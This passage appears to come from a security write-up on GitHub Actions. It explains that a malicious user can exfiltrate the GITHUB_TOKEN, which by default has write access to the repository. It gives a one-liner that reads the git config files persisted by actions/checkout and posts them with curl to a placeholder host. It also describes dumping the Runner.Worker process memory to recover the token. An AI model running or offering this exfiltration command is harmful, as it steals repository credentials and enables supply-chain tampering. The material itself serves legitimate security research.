With the GITHUB_TOKEN
a malicious user can push to the base repository or manipulate it in some other way. By default the GITHUB_TOKEN
has write permissions to all repository resources. However, this can be restricted using permissions.
In most cases it is possible to exfiltrate the GITHUB_TOKEN
with the following technique.
find $HOME/work -type f -name config | xargs cat | curl --data @- http://{IP}
This works because the actions/checkout
action persists credentials with a local git config by default.
There are rare cases when the GITHUB_TOKEN
is not referenced in a workflow and not persisted with a local git config so the above technique does not work. However, the GITHUB_TOKEN
is always passed to the Runner.Worker
process. So after having an arbitrary code execution one could dump memory of the Runner.Worker
process and grep the dump for the GITHUB_TOKEN
. See https://gist.github.com/nikitastupin/30e525b776c409e03c2d6f328f254965 for the example script.